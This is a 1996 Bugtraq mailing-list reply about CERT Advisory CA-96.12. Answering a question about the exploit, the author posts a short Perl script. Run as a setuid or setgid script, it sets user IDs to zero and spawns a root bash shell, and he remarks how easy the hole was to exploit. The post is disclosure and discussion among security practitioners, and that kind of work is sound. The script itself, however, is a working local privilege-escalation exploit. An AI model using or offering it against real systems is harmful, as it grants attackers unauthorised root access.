[2839] in bugtraq
Re: [linux-security] BoS: CERT Advisory CA-96.12 - Vulnerability
daemon@ATHENA.MIT.EDU (Jon Lewis)
Sat Jun 29 03:57:18 1996
Date: Sat, 29 Jun 1996 02:24:49 -0400
Reply-To: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
From: Jon Lewis <jlewis@inorganic5.fdt.net>
X-To: ichudov@algebra.com
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
In-Reply-To: <199606290411.XAA32291@manifold.algebra.com>
On Fri, 28 Jun 1996 ichudov@algebra.com wrote:
>
> What is the exploit?
Run this as a suid or sgid script. It doesn't matter what user or group
it's suid/sgid to...it gets root access.
#!/usr/bin/perl
$ENV{PATH}="/bin:/usr/bin";
$>=0;$<=0;
exec("/bin/bash");
Is it just me...or does it give people the willies knowing such an easy
to exploit hole was on their systems...perhaps for years.
------------------------------------------------------------------
Jon Lewis | Mime attachments are OK
jlewis@inorganic5.fdt.net | But please ask before sending
http://inorganic5.fdt.net | unsolicited huge files.
________Finger jlewis@inorganic5.fdt.net for PGP public key_______
